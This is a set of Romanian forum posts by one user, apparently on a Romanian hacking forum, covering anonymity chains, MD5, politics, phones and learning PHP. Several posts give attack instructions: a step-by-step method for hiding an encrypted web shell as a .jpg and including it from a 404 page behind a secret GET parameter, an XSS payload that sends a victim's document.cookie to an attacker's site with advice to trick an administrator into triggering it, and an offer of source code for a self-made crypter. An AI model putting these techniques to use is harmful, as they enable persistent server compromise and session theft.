yoyois

Poate cryptarea asimetrica dinte tine si VPN? PRACTIC: TU(wi-fi network)->VPN->TOR->Proxy e un chain foarte bun. (daca scori din discutie cookies, java, javascript) Ca sa-i faci traceback ca politisn/sysadmin e destul de foarte greu. Desigur exista mereu metoda hacker care nu se bazeaza pe trace-back ci pe: Social engineering, exploituri in windows/in broswer-ul tau, cookies, local storage, infectarea VPN-ului sau control asupra ISP-ului (dar multe din astea necesita NSA spy-skillz). Oricum eu sper ca vei folosi asta sa "inveti sql" sa accesezi root-uri sa-ti faci un mini-bootnet sinu pt carding-large-bootnet-gov-spying-shit.

Usor nu! Tor e o retea relativ sigura (cel putin mie mi se pare sigura ideea lor stiu ca multi ma contrazic) daca mai folosesti un encrypt-connection inainte de tor trace-ul e imposibil de greu. Anyway nu te apuca de magarii. Sunt multe alte metode sa te gaseasca. De la javascript, la java-drive-by trojans si chiar cookie/local data trace. Concluzia: Nu te apuca de magarii.

As participa si eu pe partea de VB/.NET si PHP (in alte limbaje nu stapanesc asa bine sintaxa). Ca o conditie principala ar fi: aleg pentru cine/ce sa muncesc. Faptul ca staff-ul aproba/nu anumite lucruri nu ar trebui sa-mi influenteze mie parerea. Ar fi interesant sa vedem asa ceva, insa nu cred ca se vor ivi asa multe idei valoroase. Mai ales ca 50% din valoarea produsului este data de modul de realizare. PS: Multe proiecte nu pot fi realizare de echipe asa raspandite..

Si adica ce ai facut tu? practic doar folosesti functia md5(String); care e un standard in PHP. MD5 este ireversibila intrucat se pierde informatie prin "trecerea prin functie". Fiind doar un hash, apare coliziunea intre generari, si ireversibilitatea. Gandeste-te la un hash ca la o semnatura. Nu e totuna cu persoana. Daca ai semnatura, nu stii cine a semnat-o, insa aceeeasi persoana creeaza aceiasi semnatura de fiecare data. (Daca ai persoana poti produce semnatura)

Daca nu ai rabdare, te enervezi repede, ai tendinte violente, nu-ti plac copii. NU te fa nene DOCTOR in special pediatru/pentru copii. Fa-te judecator, politist, avocat, contabil, gunoier, astronaut. Ce rost are sa-ti urasti meseria si sa nu o faci bine? Toata lumea iese in pierdere (clientul- tu nu faci ce trebuie; tu- te stresezi) Acum nu vreau sa discut despre efectele asupra copilului.. Personal am avut o experienta (clar mult mai putin traumatinzanta) intr-un spital la o praba de sange(pe la varsta de 8-9 ani). Un asemea soc cauzeaza o fobie(de doctori, ace, stomatologii, etc.) Desigur ca acest caz este discutabil (era o interventie urgenta, era copilul isteric, era doctorul prost) Insa e chiar asa greu ca fiecare sa-si faca treaba, sa discute frumos, sa il convinga, sa il pacaleasca. S-a ajuns la un nivel de toleranta mult prea mare. De la secretara/functionarul de la relatii cu publicul, la doctori si vanzatori. Just: Take care what you do. Pentru ca rezolvand acest caz, nu vei salva lumea.

Daca vrei sa verifici doar mesajele (conversatiile private), atunci se poate face 100% legal Cu un facebook-app care iti cere printr-e permisiuni si "Access la conversatiile private". Ca idee: Facebook SDK (dar necesita si putin SE)

Singurul razboi care il vom vedea va fi economic si politic! Treziti-va baieti. Nu mai exista Razboaie Mondiale. Acum sunt Bombe nucleare, submarine, Rachete de croaziera orbitale, arme meteorologice. Nu cred ca NATO, sau orice alta tara is va permite sa atace FIZIC Rusia. Un conflict de genul WWII ar duce la distrugerea lumii (vezi: Razboiul Rece) Cel mai probabil Rusia va cuceri linistita Crimeea+alte bucatele din Ucraina pe care le va recunoaste ca "tari autonome". Eventual daca NATO(SUA) are coaie, va trimite trupe de "pace" in zona, care sa sustina armata Ucrainei la "consolidarea frontierelor". (Adica vor creea o noua granita in exteriorul Crimeei, aparata de americani. Rusia nu va indrazni sa o treaca). PS: Daca SUA "consolida frontiera" Ucrainei cu 3 zile in urma, nu se ajungea la asa ceva...

Rezulatul e 0 pentru ca : Un singur protest adevarat a fost si in Romania in ultimii 20 ani .. si atunci "a deminionat" Boc. Pacat ca dupa 3 zile lumea s-a plictisit.. Acum: Protestul la ambasada rusiei ar genera doar o stire de cacat cu rezultate 0... Daca e cineva interesat, sa sune la ceva televiziune intai si sa spuna "am 40 de oameni, daca platiti pe fiecare cu 10lei, mergem sa protestam 2 ora la ambasada rusiei si aveti si voi o stire in exclusivitate." Rusia va invada Crimeea si poate tot E Ucrainei. Iar NATO va fi cea mai bleaga alianta din lume daca nu v-a interveni. In cazul in care NATO nu intervine in max 5 zile sa stopeze inaintarea Rusiei si sa consolideze frontiera, Romania ar trebui sa paraseasca NATO si sa-si porneasca un program nuclear / o armata mai mare. @j1ll2013 Gandeste-te ca ideeile astea iti sunt introduse in cap de Rusia(prin comunism)(URSS). Esti un mare prost daca nu sustii globalizarea, franta, germania, UE. Gandeste-te doar cine a ajutat la reintregirea romaniei (Transilvania).. Rusia?, cea care ne-a furat Basarabia si Bucovina? Cea care ne-a tras tepe in WWI si WWII?

@dicksi are dreptate.. Nokia se foloseste de renumele ei de "bateria tine la infinit" ca sa vanda telefoane. Specificatiile nu sunt grozave, nici bateria atasata nu pare fenomenala. E doar o stragetie simpla de marketing: Ai Facebook si Twitter + camera foto mereu, reincarci telefonul cand iti amintesti. Cred ca realitatea o sa fie usturatoare pentru cei care isi cumpara telefonul. (nu poti sa faci prea multe cu el, bateria te tine o perioada normala de 2-3 zile)

Cam greu sa gasesti csrf + xss intr-o banca (si nu in pagina de home, ci in domeniul de tranzactii). Oricum: Bravo pentru articol!

Daca tot e sa dezgropam mortii: Din cate stiu eu, Curl-ul face doar un request (TCP) catre serverul web. De ce nu posteaza un "programator PHP" (care poate chiar sa codeze). Un script "inbunatatit" care sa trimita fake respond-ul scriptului js de contorizare. Sau mai bine: Sa emuleze comportamentul unui broswer, cu js(ajax). @SuKySK Tu vrei sa te loghezi initial si apoi sa votezi? Daca da, trebuie sa scoti mai intai cookie-ul(ce verifica logarea) (poate fi si un SESSION_id) si mai apoi sa retrimiti cookie-ul impreuna cu requestul CURL pe pagina de vote.

Why choose? Invata si PHP si SQL. Inveti bazele PHP si dupa inveti SQL interogand baza de date prin scripturi PHP. Mi se pare ca PHP si SQL sunt mai usor de invatat daca le combini in proiecte de web dev. Exemplu (script de magazin online). Inveti sa faci si PHP si sa structurezi, relationezi, interoghezi baze de date cu SQL.

//remove WTF? Nu ma prind inca ce se intampla acolo

@MARIUSCS sau: poti citi caracter cu caracter. Daca caracterul este X pui in matrice / stiva 0, daca este . pui 1. Daca caracterul este "\n"(newline) treci la urmatoarea coloana (au introduci \n in stiva/vector. Faci asta cat timp nu esti la eof. (Varianta mai industriala). Combinate: Cinesti prima linie, vezi cate caractere are (n). Parcurgi tot fisierul, faci inlocuirile (cum a dat MARIUSCS exemplu) si afisezi randurile de cate n.

Acum serios: iOS este aproximativ egal cu Android (out of the box). Adaugand ca + pentru Android ca poate fi customizat, rootat, modificat si este in mare parte open-source si ca - pt iOS faptul ca este in realitate un spyware, menit sa intercepteze conversatiile private. Putem spune cu indulgenta ca iOS = Android. Acum nu vreau sa vorbesc de modul prost in care este construit iOS 7 si de resursele IMENSE pe care le consuma.. Revenind: Ubuntu pe piata mobila pare o alegerea foarte buna. Desi pare ca va avea consum de resurse cam mare, daca iti poti modifica setarile (cum poti si pe pc) cred ca meritra! Pare ca asta ar fi viitorul. Oricum direct de la lansare, Ubuntu o sa ocupe un onorabil loc 3 (dupa iOS si Android). PS: Tipii fani iOS probabil sunt si fani win8/xp .. poate si miley cyrus.

Cea mai buna metoda pe care am gasit-o eu. (verificata: site-ul era inca in lucru, deci cineva verifica zilnic fisierele si citea codul, a tinut 2 saptamani, dupa i-am spus adminului de shell si a fost inlaturat) 1. Creezi un shell simplut si il criptezi. 2. Incarci shelll-ul cu extensia .jpg intr-un folder cu imagini (sau alta extensie, important e ca folderul sa nu fie temporar). 3. Modifici pagina 404.php/error.php(care afiseaza erorile): adaugand 100 de spatii " " si apoi intr-o singura linie if($_GET['haxor']) include ("_pathul catre imaginea shell_"); 4. Ca sa accesezi shell-ul intrii pe pagina de eroare si pui parametrul get haxor. Eventual: poti pune un loader care sa iti incarce shell-ul dintr-o anumita locatie (pagina web externa) sau sa-l incarce din mai multe "bucati" incarcate in locatii diferite

Bullshit. Chestia asta se stie cam din 2009. Pana acum nu s-au gasit utilizari practice. Si ca sa raman in tema:

Bai crypterul asta l-am facut eu https://rstforums.com/forum/63286-crypter-brick-crypter-new-version-4-37-a.rst Anyway e "obfuscate" cu RedGate SmartAssembly. (daca vreti am si sursa) Care jegos se foloseste de el sa isi raspandeasca virusii?

The way of the hax0r

Suna destul de amuzant: "Win XP (...) Antivirus & privacy" ON: Dupa parerea mea RSTcore merita continuat sub urmatorul model: Sisteme de operare (pentru VM-uri) specializate pe anumite aspecte. As vrea sa vad: - Windows XP (specializat in virus analysis) - Linux (specializat ca server http/dns/etc.) - Windows (cu network tools)

nup. Pentru ca no=-1 atunci no+1 = 0 => 0=0 => True!

Daca tot vrei securitate si ai $ mergi pe un secure phone. Facut special pentru asta. Parca samsung avea : Samsung KNOX Anyway: Redphone e bun atata timp cat ai net. (voip, RSA 4096) TextSecure pt sms-uri (tot rsa) Insa orice telefon poate fi ascultat: cu un androrat(RAT) instalat pe el, un macro virus sau chiar un exploit. Asa ca: no point. Comunicarea securizata o faci schimband telefoanele.

Ca sa furi un cookie: Ai nevoie de o vulnerabilitate XSS pe care sa o folosesti pentru a executa javascript: Mai exact <script> document.location="http://site-ul_tau.com/get.php?c=" + document.cookie; </script> Pentru a fura cookie-ul cuiva trebuie ca sa-l "pacalesti" sa execute codul (prin XSS) Daca e persistent, traba merge usor. Daca nu, il poti folosi, trimitandu-l la prosti doar daca e prin get (desi nu recomand asta). Treaba merge bine daca creezi linkul cu parametru ce va executa javascriptul de mai sus si apoi il trimiti unui administrator cu ceva SE.

So you program your own bots for spam (human boots). Programarea nu se face doar la calculatoare, ci si la oameni. Vad ca incerci sa-ti creezi o retea de booti folosin exploitul prostia umana 2.0. Bravo! Sper sa faci ceva mai elaborat si puternic pe data viiitoare..

Nice! As fi interesat daca poti scrie si ceva despre metodele de constructie. Cate straturi, cati neuroni pe strat, si ce obtii. Ca la orice lucru ANN-urile trebuie "tunate". In sensul: trebuie sa ai suficienti neuroni si aranjati dupa anumite tipare, pentru a rezolva un anumit tip de problema. SI Self-building ANN? Retele care isi adauga singure neuroni?